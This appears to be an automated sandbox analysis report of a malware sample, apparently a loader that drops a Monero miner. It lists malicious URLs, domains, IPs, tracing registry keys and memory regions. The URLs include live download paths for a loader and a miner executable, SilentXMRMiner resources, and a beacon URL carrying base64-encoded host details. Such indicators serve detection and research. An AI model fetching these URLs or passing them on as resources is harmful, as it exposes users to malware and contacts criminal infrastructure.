http://185.215.113.16/Jo89Ku7d/index.phpncodede
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.phpER
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.phpncodedr
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.phpN7
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.php/dn
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.phpr7f
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.php=
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.phpdedA
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.phpnu
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.php&7:
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.php4
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.php/
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.phpncoded
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.phpm
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.php:7.
unknown
malicious
https://eijfrhegrtbrfcd.online/download/conf1.php
172.67.187.100
malicious
http://185.215.113.16/Jo89Ku7d/index.phpncoded&
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.phpncoded3
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.phpncoded4
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.phpF6Z
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.phpWindows
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.php
185.215.113.16
malicious
https://eijfrhegrtbrfcd.online/
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.phpB7V
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.phper_5879465914.exe
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.phpM6
unknown
malicious
http://185.215.113.16/Jo89Ku7d/index.phpncodedJ
unknown
malicious
https://eijfrhegrtbrfcd.online/R
unknown
https://eijfrhegrtbrfcd.online/download/miner2.0.execk.dll
unknown
https://github.com
unknown
http://185.215.113.16/W
unknown
https://eijfrhegrtbrfcd.online/download/miner2.0.exeX
unknown
http://185.215.113.16/inc/loader_5879465914.exe%
unknown
https://eijfrhegrtbrfcd.online/download/conf1.phpe
unknown
https://eijfrhegrtbrfcd.online/A
unknown
http://185.215.113.16/ViewSizePreferences.SourceAumid2
unknown
https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resource
unknown
https://eijfrhegrtbrfcd.online/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnk
unknown
http://github.com
unknown
http://www.w3.
unknown
https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.z
unknown
https://eijfrhegrtbrfcd.online/0
unknown
https://sanctam.net:58899/assets/txt/resource_url.php?type=xmrig
unknown
http://185.215.113.16/inc/loader_5879465914.exeh
unknown
http://185.215.113.16/t
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://185.215.113.16/Local
unknown
https://eijfrhegrtbrfcd.online/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0=
172.67.187.100
http://185.215.113.16/15.113.16/
unknown
http://185.215.113.16/inc/loader_5879465914.exe
unknown
http://185.215.113.16/15.113.16/System32
unknown
https://eijfrhegrtbrfcd.online/download/miner2.0.exe
172.67.187.100
http://185.215.113.16/
unknown
http://185.215.113.16/ysWOW64
unknown
https://eijfrhegrtbrfcd.online/download/conf1.phpy
unknown
https://sanctam.net:58899
unknown
https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip
140.82.121.3
http://185.215.113.16/Wiow
unknown
http://185.215.113.16/ones
unknown
http://185.215.113.16/4
unknown
https://eijfrhegrtbrfcd.online:443/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1
unknown
http://185.215.113.16/7737D9ECF5C72AA370644
unknown
https://eijfrhegrtbrfcd.online/download/miner2.0.exePz
unknown
There are 54 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
eijfrhegrtbrfcd.online
172.67.187.100
malicious
github.com
140.82.121.3
sanctam.net
unknown

IPs

IP
Domain
Country
Malicious
172.67.187.100
eijfrhegrtbrfcd.online
United States
malicious
185.215.113.16
unknown
Portugal
malicious
140.82.121.3
github.com
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\svchost64_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
48C0000
direct allocation
page read and write
malicious
4CD0000
direct allocation
page read and write
malicious
961000
unkown
page execute and read and write
malicious
5340000
direct allocation
page read and write
malicious
4AA0000
direct allocation
page read and write
malicious
C21000
unkown
page execute and read and write
malicious
345A000
trusted library allocation
page read and write
malicious
12000
unkown
page readonly
malicious
340A000
trusted library allocation
page read and write
malicious
C21000
unkown
page execute and read and write
malicious
C21000
unkown
page execute and read and write
malicious
1BAAD000
stack
page read and write
CF0000
heap
page execute and read and write
3743000
heap
page read and write
7B5000
heap
page read and write
8AE000
heap
page read and write
7A0000
heap
page read and write
4611000
heap
page read and write
912000
heap
page read and write
7A0000
heap
page read and write
3797000
heap
page read and write
41FE000
stack
page read and write
37B7000
heap
page read and write
BAB000
heap
page read and write
37B3000
heap
page read and write
830000
heap
page read and write
15952CA0000
heap
page read and write
1E9BD000
stack
page read and write
376A000
heap
page read and write
8CF000
heap
page read and write
37DC000
heap
page read and write
778000
heap
page read and write
789000
heap
page read and write
4DA6000
heap
page read and write
DC5A3BC000
stack
page read and write
37B7000
heap
page read and write
7B5000
heap
page read and write
B90000
heap
page read and write
B7D000
heap
page read and write
4611000
heap
page read and write
5550000
direct allocation
page execute and read and write
4DBE000
stack
page read and write
830000
heap
page read and write
800000
heap
page read and write
3774000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
4611000
heap
page read and write
8CA000
heap
page read and write
7B5000
heap
page read and write
7CB000
heap
page read and write
31FF000
stack
page read and write
CA0000
heap
page read and write
146E000
stack
page read and write
7BE000
heap
page read and write
87A000
heap
page read and write
3B4000
heap
page read and write
37AC000
heap
page read and write
3759000
heap
page read and write
1D8AE000
stack
page read and write
8AE000
heap
page read and write
DBB000
heap
page read and write
7CB000
heap
page read and write
6A0000
direct allocation
page read and write
37CD000
heap
page read and write
3743000
heap
page read and write
802000
heap
page read and write
45AF000
stack
page read and write
14A0000
direct allocation
page read and write
3120000
direct allocation
page read and write
802000
heap
page read and write
3B4000
heap
page read and write
7A5000
heap
page read and write
800000
heap
page read and write
830000
heap
page read and write
24911420000
heap
page read and write
4830000
direct allocation
page read and write
379F000
heap
page read and write
802000
heap
page read and write
37C0000
heap
page read and write
899000
heap
page read and write
4611000
heap
page read and write
D15000
heap
page read and write
802000
heap
page read and write
37B9000
heap
page read and write
8B4000
heap
page read and write
2EFF000
stack
page read and write
7D2000
heap
page read and write
800000
heap
page read and write
406000
unkown
page readonly
3797000
heap
page read and write
87A000
heap
page read and write
F1B000
unkown
page execute and read and write
7CB000
heap
page read and write
D75000
heap
page read and write
3616000
trusted library allocation
page read and write
800000
heap
page read and write
7BE000
heap
page read and write
8C9000
heap
page read and write
7BB000
heap
page read and write
37A6000
heap
page read and write
2F3E000
stack
page read and write
4EC0000
direct allocation
page execute and read and write
7B0000
heap
page read and write
375F000
heap
page read and write
4A40000
direct allocation
page execute and read and write
37C0000
heap
page read and write
4B3E000
stack
page read and write
7BE000
heap
page read and write
26CC28D5000
heap
page read and write
500B000
stack
page read and write
14B5000
heap
page read and write
8AE000
heap
page read and write
7FFD9B9AD000
trusted library allocation
page execute and read and write
7BB000
heap
page read and write
8CE000
heap
page read and write
C20000
unkown
page readonly
37B2000
heap
page read and write
28FE000
stack
page read and write
8CC000
heap
page read and write
14A0000
direct allocation
page read and write
876000
heap
page read and write
1DDAE000
stack
page read and write
802000
heap
page read and write
802000
heap
page read and write
2EC0000
trusted library allocation
page read and write
778000
heap
page read and write
14A0000
direct allocation
page read and write
12BB000
heap
page read and write
830000
heap
page read and write
37BA000
heap
page read and write
E75000
heap
page read and write
7D0000
heap
page read and write
AD5000
heap
page read and write
4841000
heap
page read and write
138B3000
trusted library allocation
page read and write
22000
unkown
page readonly
37C4000
heap
page read and write
7CB000
heap
page read and write
4AA0000
direct allocation
page execute and read and write
37B1000
heap
page read and write
93D000
heap
page read and write
800000
heap
page read and write
4C10000
direct allocation
page execute and read and write
379B000
heap
page read and write
3743000
heap
page read and write
800000
heap
page read and write
3B4000
heap
page read and write
1E4B0000
heap
page read and write
1DFDEFBD000
heap
page read and write
1E4E4000
heap
page read and write
800000
heap
page read and write
3767000
heap
page read and write
4841000
heap
page read and write
8CA000
heap
page read and write
31B0000
heap
page execute and read and write
7BE000
heap
page read and write
4B01000
direct allocation
page read and write
7FFD9B992000
trusted library allocation
page read and write
830000
heap
page read and write
375A000
heap
page read and write
8C9000
heap
page read and write
4611000
heap
page read and write
375A000
heap
page read and write
7B5000
heap
page read and write
379B000
heap
page read and write
10C0000
unkown
page execute and read and write
4841000
heap
page read and write
379B000
heap
page read and write
EE8000
unkown
page execute and read and write
7B0000
heap
page read and write
7BE000
heap
page read and write
7C4000
heap
page read and write
3764000
heap
page read and write
D2A000
heap
page read and write
1460000
heap
page read and write
343D000
stack
page read and write
1305000
heap
page read and write
37BB000
heap
page read and write
BDC000
stack
page read and write
2AAE000
stack
page read and write
7BE000
heap
page read and write
8E3000
heap
page read and write
37B3000
heap
page read and write
7B5000
heap
page read and write
4C30000
direct allocation
page execute and read and write
630000
direct allocation
page read and write
37A7000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
C6B000
heap
page read and write
630000
direct allocation
page read and write
4611000
heap
page read and write
373D000
heap
page read and write
3797000
heap
page read and write
4D1C000
stack
page read and write
37B3000
heap
page read and write
7FFD9B982000
trusted library allocation
page read and write
802000
heap
page read and write
370000
unkown
page readonly
1F0000
heap
page read and write
37B3000
heap
page read and write
3767000
heap
page read and write
4A10000
direct allocation
page execute and read and write
3751000
heap
page read and write
37B9000
heap
page read and write
1C000
unkown
page readonly
37A3000
heap
page read and write
802000
heap
page read and write
778000
heap
page read and write
800000
heap
page read and write
899000
heap
page read and write
9A1000
heap
page read and write
37AF000
heap
page read and write
3FFE000
stack
page read and write
912000
heap
page read and write
58A1AFF000
stack
page read and write
4830000
direct allocation
page read and write
4841000
heap
page read and write
2D6E2950000
heap
page read and write
37B7000
heap
page read and write
87A000
heap
page read and write
3E0000
heap
page read and write
37B7000
heap
page read and write
7CB000
heap
page read and write
37A6000
heap
page read and write
80000
heap
page read and write
401000
unkown
page execute read
37B6000
heap
page read and write
160000
heap
page read and write
7FDE000
stack
page read and write
800000
heap
page read and write
3773000
heap
page read and write
37B8000
heap
page read and write
133C1000
trusted library allocation
page read and write
830000
heap
page read and write
132A7000
trusted library allocation
page read and write
26CC2550000
heap
page read and write
37B7000
heap
page read and write
A00000
heap
page read and write
374A000
heap
page read and write
37B7000
heap
page read and write
3B4000
heap
page read and write
37B3000
heap
page read and write
876000
heap
page read and write
4E30000
direct allocation
page execute and read and write
1E554000
heap
page read and write
2CFF000
stack
page read and write
212B5406000
heap
page read and write
66C000
stack
page read and write
48BE000
stack
page read and write
2D6E2A40000
heap
page read and write
4841000
heap
page read and write
C54000
unkown
page execute and read and write
393E000
stack
page read and write
912000
heap
page read and write
778000
heap
page read and write
7B5000
heap
page read and write
912000
heap
page read and write
7A6000
heap
page read and write
3773000
heap
page read and write
57C000
stack
page read and write
37E0000
heap
page read and write
830000
heap
page read and write
3510000
trusted library allocation
page read and write
4841000
heap
page read and write
8CE000
heap
page read and write
7FFD9BA3C000
trusted library allocation
page execute and read and write
7FFD9BA96000
trusted library allocation
page execute and read and write
7FFD9B9A4000
trusted library allocation
page read and write
37B3000
heap
page read and write
778000
heap
page read and write
8CF000
heap
page read and write
37A6000
heap
page read and write
8CD000
heap
page read and write
93D000
heap
page read and write
30BF000
stack
page read and write
802000
heap
page read and write
899000
heap
page read and write
3B4000
heap
page read and write
A0C000
heap
page read and write
3767000
heap
page read and write
4611000
heap
page read and write
7BE000
heap
page read and write
4841000
heap
page read and write
4C30000
direct allocation
page execute and read and write
1D07D000
stack
page read and write
3797000
heap
page read and write
4611000
heap
page read and write
1DFDEF20000
remote allocation
page read and write
3784000
heap
page read and write
12EF000
stack
page read and write
359B000
trusted library allocation
page read and write
378B000
heap
page read and write
BDE000
stack
page read and write
3E6E000
stack
page read and write
37CC000
heap
page read and write
33C1000
trusted library allocation
page read and write
800000
heap
page read and write
37AE000
heap
page read and write
37B7000
heap
page read and write
3744000
heap
page read and write
800000
heap
page read and write
3B4000
heap
page read and write
8CE000
heap
page read and write
7BB000
heap
page read and write
183F000
stack
page read and write
4611000
heap
page read and write
BBD000
heap
page read and write
40B000
unkown
page read and write
F2A000
unkown
page execute and write copy
4611000
heap
page read and write
3798000
heap
page read and write
B10000
heap
page read and write
610000
heap
page read and write
8B5000
heap
page read and write
7FFD9B9AD000
trusted library allocation
page execute and read and write
1BFE0000
heap
page read and write
160000
heap
page read and write
2491146C000
heap
page read and write
6A01000
heap
page read and write
7A6000
heap
page read and write
379B000
heap
page read and write
4611000
heap
page read and write
26CC28E0000
heap
page read and write
8C0000
heap
page read and write
802000
heap
page read and write
376A000
heap
page read and write
4611000
heap
page read and write
357C000
trusted library allocation
page read and write
66C000
stack
page read and write
37B3000
heap
page read and write
3120000
direct allocation
page read and write
3745000
heap
page read and write
4611000
heap
page read and write
3B4000
heap
page read and write
2B67000
heap
page read and write
3120000
direct allocation
page read and write
28EE000
stack
page read and write
37AC000
heap
page read and write
414000
unkown
page readonly
379B000
heap
page read and write
3759000
heap
page read and write
87A000
heap
page read and write
3B4000
heap
page read and write
8CB000
heap
page read and write
800000
heap
page read and write
914000
heap
page read and write
7FFD9B9CD000
trusted library allocation
page execute and read and write
87A000
heap
page read and write
437F000
stack
page read and write
38E7000
trusted library allocation
page read and write
37AC000
heap
page read and write
8C0000
heap
page read and write
1D15E000
stack
page read and write
374E000
heap
page read and write
37A1000
heap
page read and write
7BB000
heap
page read and write
10C0000
unkown
page execute and read and write
A9B000
heap
page read and write
630000
direct allocation
page read and write
990000
heap
page execute and read and write
3738000
heap
page read and write
379F000
heap
page read and write
1E0AE000
stack
page read and write
7B5000
heap
page read and write
37B8000
heap
page read and write
7C5000
heap
page read and write
7A0000
heap
page read and write
7AE000
heap
page read and write
4841000
heap
page read and write
930000
heap
page read and write
2F7F000
stack
page read and write
37B7000
heap
page read and write
8CD000
heap
page read and write
802000
heap
page read and write
802000
heap
page read and write
377A000
heap
page read and write
830000
heap
page read and write
2491147C000
heap
page read and write
875000
heap
page read and write
899000
heap
page read and write
4611000
heap
page read and write
4C30000
direct allocation
page execute and read and write
E11000
unkown
page execute and read and write
26CC2650000
heap
page read and write
8AE000
heap
page read and write
7FFD9B9CB000
trusted library allocation
page execute and read and write
3500000
trusted library allocation
page read and write
379E000
heap
page read and write
7B5000
heap
page read and write
4841000
heap
page read and write
3754000
heap
page read and write
2E7E000
stack
page read and write
830000
heap
page read and write
F2A000
unkown
page execute and write copy
4620000
heap
page read and write
6D6000
heap
page read and write
1D68E000
stack
page read and write
1905000
heap
page read and write
4841000
heap
page read and write
950000
heap
page read and write
B08000
heap
page read and write
88E000
heap
page read and write
830000
heap
page read and write
8AE000
heap
page read and write
762000
heap
page read and write
1025000
heap
page read and write
7B5000
heap
page read and write
7A0000
heap
page read and write
899000
heap
page read and write
752000
heap
page read and write
37B9000
heap
page read and write
D30000
trusted library allocation
page read and write
7CC000
heap
page read and write
38E5000
trusted library allocation
page read and write
3774000
heap
page read and write
8C0000
heap
page read and write
912000
heap
page read and write
70A000
heap
page read and write
4C3F000
stack
page read and write
7BB000
heap
page read and write
323F000
stack
page read and write
93D000
heap
page read and write
830000
heap
page read and write
8AE000
heap
page read and write
B5C000
heap
page read and write
630000
direct allocation
page read and write
8AE000
heap
page read and write
379F000
heap
page read and write
8CE000
heap
page read and write
54D0000
direct allocation
page execute and read and write
212B542F000
heap
page read and write
4C30000
direct allocation
page execute and read and write
6BE000
heap
page read and write
E2E000
stack
page read and write
337E000
stack
page read and write
4E40000
direct allocation
page execute and read and write
3797000
heap
page read and write
37C4000
heap
page read and write
3797000
heap
page read and write
2AFE000
stack
page read and write
374E000
heap
page read and write
7B5000
heap
page read and write
32D9000
trusted library allocation
page read and write
10BE000
unkown
page execute and read and write
B10000
heap
page read and write
37B0000
heap
page read and write
3751000
heap
page read and write
4B0000
heap
page read and write
14A0000
direct allocation
page read and write
800000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
37B3000
heap
page read and write
3778000
heap
page read and write
4DA0000
heap
page read and write
4921000
direct allocation
page read and write
1F1BF000
stack
page read and write
781000
heap
page read and write
4840000
heap
page read and write
3778000
heap
page read and write
37CD000
heap
page read and write
377F000
heap
page read and write
DFE000
unkown
page execute and read and write
7FFD9BA40000
trusted library allocation
page execute and read and write
34BE000
stack
page read and write
EB6000
heap
page read and write
36ED000
trusted library allocation
page read and write
37B3000
heap
page read and write
C21000
unkown
page execute and write copy
13628000
trusted library allocation
page read and write
26FB000
stack
page read and write
7FFD9B9CD000
trusted library allocation
page execute and read and write
375F000
heap
page read and write
15953060000
heap
page read and write
3503000
trusted library allocation
page read and write
374C000
heap
page read and write
37BA000
heap
page read and write
37B9000
heap
page read and write
382E000
stack
page read and write
8CF000
heap
page read and write
7B5000
heap
page read and write
4A10000
direct allocation
page execute and read and write
3797000
heap
page read and write
7BE000
heap
page read and write
830000
heap
page read and write
7D0000
heap
page read and write
54A0000
direct allocation
page execute and read and write
960000
unkown
page read and write
37C4000
heap
page read and write
37C7000
heap
page read and write
35AA000
trusted library allocation
page read and write
13411000
trusted library allocation
page read and write
4611000
heap
page read and write
8E3000
heap
page read and write
37B3000
heap
page read and write
18D0000
heap
page read and write
4830000
direct allocation
page read and write
3774000
heap
page read and write
350C000
trusted library allocation
page read and write
9D5000
heap
page read and write
7FFD9BA70000
trusted library allocation
page execute and read and write
7FFD9B97D000
trusted library allocation
page execute and read and write
830000
heap
page read and write
7BE000
heap
page read and write
3137000
heap
page read and write
630000
direct allocation
page read and write
4DB0000
heap
page read and write
3C4C000
stack
page read and write
37AC000
heap
page read and write
7BB000
heap
page read and write
37CD000
heap
page read and write
3B4000
heap
page read and write
12C000
stack
page read and write
4600000
direct allocation
page read and write
3B4000
heap
page read and write
2D8F1618000
heap
page read and write
7FFD9B9C4000
trusted library allocation
page read and write
3751000
heap
page read and write
7B5000
heap
page read and write
830000
heap
page read and write
378D000
heap
page read and write
556D000
stack
page read and write
28FD000
stack
page read and write
4CD0000
direct allocation
page read and write
378A000
heap
page read and write
4CA0000
direct allocation
page execute and read and write
7CB000
heap
page read and write
8AE000
heap
page read and write
1CB9D000
stack
page read and write
22798EF8000
heap
page read and write
8CB000
heap
page read and write
4841000
heap
page read and write
830000
heap
page read and write
2B30000
heap
page read and write
2EAF000
stack
page read and write
3797000
heap
page read and write
2B3F000
stack
page read and write
7A0000
heap
page read and write
7BE000
heap
page read and write
3D3F000
stack
page read and write
3757000
heap
page read and write
C6B000
unkown
page execute and write copy
93D000
heap
page read and write
4841000
heap
page read and write
37B7000
heap
page read and write
C00000
direct allocation
page execute and read and write
119F000
stack
page read and write
375F000
heap
page read and write
3CEF000
stack
page read and write
129C000
heap
page read and write
3797000
heap
page read and write
778000
heap
page read and write
4C40000
direct allocation
page execute and read and write
4841000
heap
page read and write
4A10000
direct allocation
page execute and read and write
12D2000
heap
page read and write
4850000
heap
page read and write
4C30000
direct allocation
page execute and read and write
4EE0000
direct allocation
page execute and read and write
DE59AFF000
stack
page read and write
3BBE000
stack
page read and write
37C7000
heap
page read and write
14A0000
direct allocation
page read and write
87A000
heap
page read and write
37C4000
heap
page read and write
8C0000
heap
page read and write
7B0000
heap
page read and write
4AFF000
stack
page read and write
31AF000
stack
page read and write
EAF000
heap
page read and write
3D7E000
stack
page read and write
8CE000
heap
page read and write
3221000
trusted library allocation
page read and write
4611000
heap
page read and write
D90000
heap
page read and write
7B5000
heap
page read and write
DCE000
heap
page read and write
F1B000
unkown
page execute and read and write
7BE000
heap
page read and write
8CC000
heap
page read and write
427E000
stack
page read and write
876000
heap
page read and write
8C0000
heap
page read and write
4830000
direct allocation
page read and write
1C13D000
stack
page read and write
3781000
heap
page read and write
8C0000
heap
page read and write
3797000
heap
page read and write
C5B000
unkown
page execute and read and write
7FFD9BB20000
trusted library allocation
page execute and read and write
3773000
heap
page read and write
37AC000
heap
page read and write
830000
heap
page read and write
132A9000
trusted library allocation
page read and write
374E000
heap
page read and write
37C8000
heap
page read and write
876000
heap
page read and write
800000
heap
page read and write
800000
heap
page read and write
800000
heap
page read and write
4CC0000
direct allocation
page execute and read and write
F3A7EFE000
stack
page read and write
3762000
heap
page read and write
37B0000
heap
page read and write
33DF000
stack
page read and write
77A000
heap
page read and write
37C4000
heap
page read and write
32A1000
trusted library allocation
page read and write
37BA000
heap
page read and write
7A6000
heap
page read and write
14A0000
direct allocation
page read and write
800000
heap
page read and write
876000
heap
page read and write
914000
heap
page read and write
7BB000
heap
page read and write
3773000
heap
page read and write
700000
heap
page read and write
914000
heap
page read and write
132A1000
trusted library allocation
page read and write
1E0000
heap
page read and write
3782000
heap
page read and write
2AA0000
trusted library allocation
page read and write
359F000
trusted library allocation
page read and write
376A000
heap
page read and write
378B000
heap
page read and write
BF6000
stack
page read and write
37DC000
heap
page read and write
720000
remote allocation
page read and write
7FFD9B9AD000
trusted library allocation
page execute and read and write
802000
heap
page read and write
7FFD9BB47000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
37AC000
heap
page read and write
3ABF000
stack
page read and write
9EC000
heap
page read and write
3773000
heap
page read and write
8CF000
heap
page read and write
8C9000
heap
page read and write
D1E000
heap
page read and write
37AC000
heap
page read and write
37B8000
heap
page read and write
4600000
direct allocation
page read and write
4600000
direct allocation
page read and write
800000
heap
page read and write
4611000
heap
page read and write
830000
heap
page read and write
8CF000
heap
page read and write
36FF000
stack
page read and write
87A000
heap
page read and write
7CB000
heap
page read and write
7B5000
heap
page read and write
2AFF000
stack
page read and write
4841000
heap
page read and write
8C9000
heap
page read and write
88F000
heap
page read and write
1BF40000
heap
page execute and read and write
1DFDEF8C000
heap
page read and write
26CC2715000
heap
page read and write
4611000
heap
page read and write
37B9000
heap
page read and write
514F000
stack
page read and write
2D8F14E0000
heap
page read and write
CA0000
trusted library allocation
page read and write
375D000
trusted library allocation
page read and write
C80000
heap
page execute and read and write
7FFD9BA60000
trusted library allocation
page execute and read and write
3737000
heap
page read and write
37A6000
heap
page read and write
37C4000
heap
page read and write
912000
heap
page read and write
3796000
heap
page read and write
3374000
trusted library allocation
page read and write
3B4000
heap
page read and write
1FA3FC80000
heap
page read and write
37A6000
heap
page read and write
14B0000
heap
page read and write
4841000
heap
page read and write
376E000
heap
page read and write
373E000
heap
page read and write
4600000
direct allocation
page read and write
EA471DC000
stack
page read and write
1BFEA000
heap
page read and write
8CA000
heap
page read and write
37B3000
heap
page read and write
4D0000
heap
page read and write
876000
heap
page read and write
37B8000
heap
page read and write
800000
heap
page read and write
BC1000
heap
page read and write
1D95F000
stack
page read and write
3788000
heap
page read and write
37CC000
heap
page read and write
87A000
heap
page read and write
A24000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
800000
heap
page read and write
4841000
heap
page read and write
762000
heap
page read and write
276F000
stack
page read and write
876000
heap
page read and write
7B0000
heap
page read and write
1810000
heap
page execute and read and write
4611000
heap
page read and write
373E000
heap
page read and write
4C00000
heap
page read and write
800000
heap
page read and write
7BB000
heap
page read and write
1FA3FBA0000
heap
page read and write
7FFD9B9A4000
trusted library allocation
page read and write
8CA000
heap
page read and write
802000
heap
page read and write
899000
heap
page read and write
4841000
heap
page read and write
37B3000
heap
page read and write
37B3000
heap
page read and write
7B5000
heap
page read and write
5560000
direct allocation
page execute and read and write
914000
heap
page read and write
42FF000
stack
page read and write
212B53D2000
heap
page read and write
37BF000
stack
page read and write
3B4000
heap
page read and write
630000
direct allocation
page read and write
876000
heap
page read and write
4CB0000
direct allocation
page execute and read and write
379F000
heap
page read and write
37B6000
heap
page read and write
37EF000
stack
page read and write
802000
heap
page read and write
376A000
heap
page read and write
377F000
heap
page read and write
3743000
heap
page read and write
3EBE000
stack
page read and write
C82000
unkown
page execute and read and write
6BA000
heap
page read and write
3752000
heap
page read and write
C2B000
heap
page read and write
4611000
heap
page read and write
1DFDEF61000
heap
page read and write
93D000
heap
page read and write
912000
heap
page read and write
37B5000
heap
page read and write
899000
heap
page read and write
167E000
stack
page read and write
37AE000
heap
page read and write
93C000
heap
page read and write
379B000
heap
page read and write
F2A000
unkown
page execute and read and write
374E000
heap
page read and write
6A0000
direct allocation
page read and write
7FFD9BA6C000
trusted library allocation
page execute and read and write
87A000
heap
page read and write
800000
heap
page read and write
899000
heap
page read and write
37C4000
heap
page read and write
C76000
heap
page read and write
3B4000
heap
page read and write
7BE000
heap
page read and write
C8B000
unkown
page execute and read and write
B51000
unkown
page execute and read and write
830000
heap
page read and write
37AC000
heap
page read and write
AE0000
heap
page read and write
7CB000
heap
page read and write
347F000
stack
page read and write
630000
direct allocation
page read and write
800000
heap
page read and write
3760000
heap
page read and write
8CA000
heap
page read and write
37C4000
heap
page read and write
4841000
heap
page read and write
7A0000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
377A000
heap
page read and write
802000
heap
page read and write
2491142B000
heap
page read and write
7FFD9B9BD000
trusted library allocation
page execute and read and write
914000
heap
page read and write
4611000
heap
page read and write
37B3000
heap
page read and write
159F000
stack
page read and write
54C0000
direct allocation
page execute and read and write
B55000
heap
page read and write
472E000
stack
page read and write
37B5000
heap
page read and write
D10000
trusted library allocation
page read and write
648F000
heap
page read and write
4611000
heap
page read and write
778000
heap
page read and write
4441000
heap
page read and write
3767000
heap
page read and write
912000
heap
page read and write
346E000
stack
page read and write
35AE000
stack
page read and write
8CF000
heap
page read and write
8B4000
heap
page read and write
375A000
heap
page read and write
376E000
heap
page read and write
802000
heap
page read and write
37B8000
heap
page read and write
4600000
direct allocation
page read and write
138B1000
trusted library allocation
page read and write
212B53A0000
remote allocation
page read and write
10BF000
unkown
page execute and write copy
37CD000
heap
page read and write
22799010000
heap
page read and write
3A7D000
stack
page read and write
7CB000
heap
page read and write
6A0E000
heap
page read and write
8AE000
heap
page read and write
CC0000
heap
page read and write
1CC7E000
stack
page read and write
1D0000
heap
page read and write
10BF000
unkown
page execute and write copy
E57000
heap
page read and write
7CB000
heap
page read and write
4CD0000
direct allocation
page read and write
7A0000
heap
page read and write
4EC1000
heap
page read and write
912000
heap
page read and write
900000
heap
page read and write
1B71D000
stack
page read and write
3B4000
heap
page read and write
3754000
heap
page read and write
3B4000
heap
page read and write
27B7000
heap
page read and write
12C2000
heap
page read and write
303F000
stack
page read and write
3B4000
heap
page read and write
127F000
stack
page read and write
3797000
heap
page read and write
7BB000
heap
page read and write
3773000
heap
page read and write
375C000
heap
page read and write
7FFD9BB40000
trusted library allocation
